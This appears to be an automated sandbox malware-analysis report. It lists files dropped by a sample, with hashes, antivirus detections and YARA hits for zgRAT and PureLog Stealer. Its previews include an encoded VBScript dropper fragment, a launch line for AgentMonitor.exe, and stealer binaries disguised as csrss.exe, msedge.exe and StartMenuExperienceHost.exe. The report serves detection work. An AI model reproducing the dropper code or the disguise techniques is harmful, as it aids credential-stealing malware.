                                    SHA-256:3E51E81E8759E98D54C199A7FF2A8F3C9E66B1AC29DC47CFAB94E8B2CC4469B8
                                    SHA-512:7D563872B45984D96B9AD74EE15B4EB64418C70BC72EABE8F916D908E2122C7BFF5F66948EC7E58E9BAF2E4C71E8C3592139F121575AE080A6CC029F2FD865C1
                                    Malicious:false
                                    Preview:%yDApQwjcHqqien%%FyVNXSf%..%jGLxVGWfTOoa%"C:\Blockcomcrt/AgentMonitor.exe"%liLlpkYVaQOZJUm%

                                    C:\Blockcomcrt\spG4AUp7NlO1gWWyb8eNrRy5s0mKYH4wJzJCIrd.vbe

                                    Download File
                                    Process:C:\Users\user\Desktop\Internal.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):233
                                    Entropy (8bit):5.885990830988985
                                    Encrypted:false
                                    SSDEEP:6:GlwqK+NkLzWbH1rFnBaORbM5nCKvQSmy5Ru+iIaHs:GoMCzWL1hBaORbQCq9mfeD
                                    MD5:608C11DD9C227C9EA2D097F4D8ACECAA
                                    SHA1:B4ACA298525E851D4756A8197814B3F8FDC118E5
                                    SHA-256:7F2D511CCA49EA0F685E044AB7D26E62A265B6D698F2F4A32B97B20AB4D4962A
                                    SHA-512:717AF874245ECEEE21F71024F10F43DEE7A9F77FA984AEC14D62591E90E20585694454D97C88171A9D1F42F5F19C7C8C1F48E31201E1BEE4C4AA85656AA8474B
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:#@~^0AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v 0!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z$^W13mK:1.YJzU?`&5}nhWMs&.NAWXijOyDnCGCB^X.48r67A!3bpKO{c4CYrS,!S,0mV/.RUIAAA==^#~@.

                                    C:\Program Files (x86)\Google\bfa9d28cc9a91f

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (592), with no line terminators
                                    Category:dropped
                                    Size (bytes):592
                                    Entropy (8bit):5.896743836227658
                                    Encrypted:false
                                    SSDEEP:12:2pzCZHRyIPkY8NkDNAU3sDb/TOciDYhbSFWJOy9HlIXtSwcpD+/:2SRyIsY8NkDNWb/T04bJJOy9zv9+/
                                    MD5:3E1E8EFDF180585392E9ADDDFF72292A
                                    SHA1:5A75DD9F54A81AB52817E9BDDE6D0575090EC9A8
                                    SHA-256:6ABD0CB30D5C0F6EB1E26C7A8065F9E8DEDAEB3DC2D2AC899BD4B369314BE4DB
                                    SHA-512:443BA639CE13F581A6229E87605F55C6B3304430EFEA37518989E30FD72EAC62132C5845675205ACA8D569A23E4DAFE7ADEB2790AABFD6DCD8950FE85E8AE5E5
                                    Malicious:false
                                    Preview:82TDt2lpfZ3Wt50G6Gvux0uLmjiqBMeypIN9ex45eUZL7zFPWUWSXVwIHIaJU5oS4Erls0mIMzQdbiNxdSUrzMbTVE2VWuljqGR3IehfrOGiFTri4npBk6csnXPn8QvbOqwURUo9vy9kG3OCXTbtEj8unjQvO4hbdoTYgWRk9qQw72mtINPpyCXosCqsE3v1RiHbjzfBC1uYTMxv6gmAo2mbRpqepifF5ZfYuKKTsNm7R8UfP5vhQuMZ5qK4JBVdVod4rYBwWTSbPoJSUKOuw8yKMFdE9QJq2JmnfZy149L7bvKQg2j8wlqXzSrl46wGJmjFCgw5VX0xx1sb5MhHqK3QdOxMrN67NExzLENAFonZu3j8jPprZoZ9sSmxsjNIa3jsE3P19hCChegjpznchPiipyH3cZRfae91T13qAys1mWbOwCI36vkLVBDQwWZjPglDeoQx57btgq6SW2HZRYip3xgSyn3oYImFuYtHvU79T1ooEu33O9S175JrI89RDxUXE0i7JAn6ajWCJ1NDu9ZY0uHyPC9xUq6fgRkNM5uNWWaYjHhQu6hDY5hTstsGBzlun1g2QA1yPLCe

                                    C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H....................... ...."..@........................................0..........(.... ........8........E........9...........8....(.... ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..@....... ........8........E....Y.......}...........5.......8T.......~....(_...~....(c... ....<.... ........8....8.... ....~....{m...9....& ....8....8.... ....~....{b...:m...& ....8b......... ....~....{....9H...& ....8=...~....(W... .... .... ....s....~

                                    C:\Program Files (x86)\Microsoft\Edge\Application\CSC4F1AC5479EE446D0ADC298BB684B1769.TMP

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):1168
                                    Entropy (8bit):4.448520842480604
                                    Encrypted:false
                                    SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                    MD5:B5189FB271BE514BEC128E0D0809C04E
                                    SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                    SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                    SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                    Malicious:false
                                    Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):4608
                                    Entropy (8bit):3.931642084593758
                                    Encrypted:false
                                    SSDEEP:48:65mhtgWxZ8RxeOAkFJOcV4MKe28dMdfJ3evqBH7uulB+hnqXSfbNtm:BCXxvxVx9+evktTkZzNt
                                    MD5:AD24EFD4AC1D16536658DE1845095A45
                                    SHA1:B1EF0C4B5FD6BA3484B9CC3F71C56D9416303455
                                    SHA-256:4B41F4F088752B151B9E0EA5D62C70D36E094F6E4E80D9A1EE101B8D9763426A
                                    SHA-512:A9D4BF77ABA6F977B59C8089B2841C042091E8EB63DABF298CB4387A8D02AEC570627A9B554E4A59F13F07370C5E5D7FB5067A654C988F51F318EA0F92E29475
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iG.f.............................'... ...@....@.. ....................................@.................................p'..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..H.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID...(... ...#Blob...........WU........%3................................................................

                                    C:\Recovery\886983d96e3d3e

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (515), with no line terminators
                                    Category:dropped
                                    Size (bytes):515
                                    Entropy (8bit):5.866626211578882
                                    Encrypted:false
                                    SSDEEP:12:1wrpPWXmnoDGXZ53e6H3vb1iKHjKDCONiYkxf49AQtLUn0QTvDklUx:Kp+X0OoJHc2jDf49in0KDkl2
                                    MD5:97FE3F1FED9B755749DC7946DB4FF496
                                    SHA1:B7EC04E3A875E120A4C5EFA967D52401B847FB5D
                                    SHA-256:D6AA658092F76F88A8CFE55A25AA0A15BE54EE802C09A7A0B2D811026FEB8CE5
                                    SHA-512:42FD34CBCB1B034D5C8A6D53C6AC32CE040E7B98270117E4AAA5E0B707379EAFD84446EB88ADC3529B0AB1C556D265CC3B160E5D147F32207AA733F186FB452E
                                    Malicious:false
                                    Preview:gCiRFWhsi9hwnTQaxEjs5y9qpA6M0nzPvBAAcXelFCFcqKPy8xTkXJkrD2lFaU25JSBlSQ7Zk8n2sg9fvHNDUP1lbS7kwYLuKKSYInfsz3AZgr8g2GUSGyk4baKATWnLw2riOlWIlfNaPbEtTbrqE2nWjY6scfYcQynn9aRRtLrlkKp9Vaq2p7H4PV90oopGGuJbybu3Ja62LCvYt6XCzgxTqsYoabmFgle0BOL3qwsPAOtMklHrQmQk7zuFCFdsx1Vki4XfvdWCxhTb9LDzU5y4U32LdF0kTAcI3JnpOm6xQOwZgSG0CoX2DbPoCLBpmvtxFKiziYks8BnFHdpL89iomjFb39nCkQKee9TVtRSnDp3CxKhifzqmNFKfFH6ivhHs0JlHJTcrq4k7qCntbEhvjhQZzyQmUu2fiLLoiaZMX96TeMzCdMHqAVIT2LSVDzX6BFZf19KBoUYkl65m8OJImLfMC2vXHEJhm9SYxTLdCGCp7is5PpWzqPUzjMd9Ow3

                                    C:\Recovery\bfa9d28cc9a91f

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (553), with no line terminators
                                    Category:dropped
                                    Size (bytes):553
                                    Entropy (8bit):5.866003942864501
                                    Encrypted:false
                                    SSDEEP:12:BovjOstPxLf4Zsuz6UW4OYHe3DJQqIJ6rOt5Ek:BYvTLGrKOeVcEat5Ek
                                    MD5:5A25F9E027282FE97F63AD3F924B2A4D
                                    SHA1:D02D418D7D5486B79463CC237594BE126474C9B9
                                    SHA-256:D088EEDD1C6FE1131914C9CD3D4A66EACAD52E0EDA07E3521EB4790EF2A5892F
                                    SHA-512:75F111679D04F9D36191E5DD8EB1EA1D1E346650F9DF35658C39D626163298A1E99BE9BC9F69AE839A252F42510E51E2C257A9244B1E98EC804CDC4F77856D7A
                                    Malicious:false
                                    Preview:9CzwpUlkoS1cm5sfYT7V4KWF2jC4MRqvQWVmH59f0YBoHzGSn2KV6ynzqt4GSrXXmGLPkGXcTcffIr8DctQUGVybtg5XB2MJBoCAn0shesCeTHr8v0oiaDRQSugDKAaaPVeep7alBtzYSTHmz7mLOos7Wvs2UoXeRlP7mNTxaChrN378m4ONXPLkmgH3OhQXVUGrDJ9mnyvLHBudxuPaZKGBapVGFZj2vKV3wQ4c4mjje9dlwnGeS07LNFQYy3gOO3a7p0rgzwfwlhhaLuTcTEj5MKpr9goBGVUljf556jpfUKkqi0MEjD4KTeufLAhTIepQM50pzXftZElBk8IJTjbCaKSFvZt6CWXzeUemAhPLiLuO2t5N1X9iCnzCnu4ZnjrDrvgPefIwUPePaDMCdgFoWyw1ec9Pmzh8dqhGMpsVPNNwIklji25HeCr29ovCg3JesfvtgFzyxtZIk9t30Zru3aea8oHh4qyVEtEmz1DcCHTuniR951LGLZkRBUv18S4H4DE15HE8WPrwHuwZXImCfsKoIxleGMduNMzke

                                    C:\Recovery\csrss.exe

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H....................... ...."..@........................................0..........(.... ........8........E........9...........8....(.... ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..@....... ........8........E....Y.......}...........5.......8T.......~....(_...~....(c... ....<.... ........8....8.... ....~....{m...9....& ....8....8.... ....~....{b...:m...& ....8b......... ....~....{....9H...& ....8=...~....(W... .... .... ....s....~

                                    C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H....................... ...."..@........................................0..........(.... ........8........E........9...........8....(.... ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..@....... ........8........E....Y.......}...........5.......8T.......~....(_...~....(c... ....<.... ........8....8.... ....~....{m...9....& ....8....8.... ....~....{b...:m...& ....8b......... ....~....{....9H...& ....8=...~....(W... .... .... ....s....~

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\55b276f4edf653

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with very long lines (715), with no line terminators
                                    Category:dropped
                                    Size (bytes):715
                                    Entropy (8bit):5.877744765668358
                                    Encrypted:false
                                    SSDEEP:12:d3PhrUe/2w/wKg8JIrvI8Qe4szEklJdktSlhZGjv8Pzuucdmvhj0:9N2QwZsIr4zedm8zbcwJj0
                                    MD5:1E382BCF353384188D8A20DE5B95B3BA
                                    SHA1:5AA5C7E183B84BB4CE64507F74ABB939D2C5BFA6
                                    SHA-256:84F47284F4974FFA09F66DCFF285F43E583B69FBE4120B17E2F1006FC4C07BC4
                                    SHA-512:1F2672B06DF152EF441062BE0F3A69E7A804217ADF11A759901F5F751A8008377CC92A124FD5154EC8EAD0B2FB7028368733BD933E0C1A9CCEF6F73FDBEAA67B
                                    Malicious:false
                                    Preview:yJQiVezp1mM3ZtHgk2Jv6i55M56EyOS7N6TnU6vsoEVkmqEq5RNUkLvPOVVZhu1nTOpdZeLoHbH1NVSf0QIgB7WCKDY9kVL3NsQXBlQbFjNJD3C3CzjQmUlW1nSWFMDwPNoeF4eO9racuN8QAf6vv4R2G4fXT4V3fb30PiyHUUR43JlooBVkPSAV6vYLZG5EVh6TTIBcryabmW86S1tSjvnNai3dJnsOYMiWMSVf922b2jsjxb2hXnfk3t2uPhTEGMCaxmt9fNSr2MV1zTqruK0vr8cdakQbjyUpgSvKr3CKVyrrYA451lU5VRtzKQj460IE1pUhigA0IqZ2RuEZqVk7dZUPj6AaUHNfqmztpXWVldxp10hZMJOlPKkcVF8lgjgAd4Mo5VuS8PWAloYsYkOK3lPfBXYkYvzC6wM6o3e0Z5mAyk0qqPN5UWH1pqmh7J4NaTEzccEfGYv79Orbgr4Jh3skpVQ7Q63PBZkefBNNLsy6kJ2a8LBPPvpgleJHMGPKef6joM5fdq7zFv9gdz9E4oAQtE3B1GBEdobFMSwwPfvix0bzemoWHKP0eq0kT4nXp2WaU3UKDMzZ3cd3mDgPcp7TZlkgcLcV2Y34eAflSdS4U06BN67PXY495DBsSxs1uegfjiZmi569XC8jojTfOM7ed38b9wSeuaK0TbcohVrbb4m2EcDteMnhgCBpj8mvncO62IP

                                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1961472
                                    Entropy (8bit):7.549799688187276
                                    Encrypted:false
                                    SSDEEP:49152:UHvZQJjZ5ic+4lTZrOpYwGRzHsHgZqa27K/C1eRLOW:UHRQJjZUd4lTpOrGRzHsAgaAYC1A
                                    MD5:84072063FC067434706597D88E3252A9
                                    SHA1:44604B1659DE7CE81DF818EF3C9ADE92FA90A0CC
                                    SHA-256:353A6E5793B9F96C00A6AF70515D7671930F4B280F3B74BA03646B005F0E4918
                                    SHA-512:27E7BF98241695165A4C38CB6563639DB64EE1DC05F253ECF7AA5251C5073BEA5636C84003CEC4C56686B495D22B295A2C86F1788C3C46C902B103843B68847D
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Recent\StartMenuExperienceHost.exe, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 55%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....l.f................................. ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H....................... ...."..@........................................0..........(.... ........8........E........9...........8....(.... ....8....*(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8........0..@....... ........8........E....Y.......}...........5.......8T.......~....(_...~....(c... ....<.... ........8....8.... ....~....{m...9....& ....8....8.... ....~....{b...:m...& ....8b......... ....~....{....9H...& ....8=...~....(W... .... .... ....s....~

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentMonitor.exe.log

                                    Download File
                                    Process:C:\Blockcomcrt\AgentMonitor.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1396
                                    Entropy (8bit):5.350961817021757
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                    MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                    SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                    SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                    SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WmiPrvSE.exe.log

                                    Download File
                                    Process:C:\Blockcomcrt\WmiPrvSE.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\csrss.exe.log

                                    Download File
                                    Process:C:\Recovery\csrss.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\yxeaYbTPMzNPCanFqSswYWhX.exe.log

                                    Download File
                                    Process:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):847
                                    Entropy (8bit):5.354334472896228
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                    Malicious:false
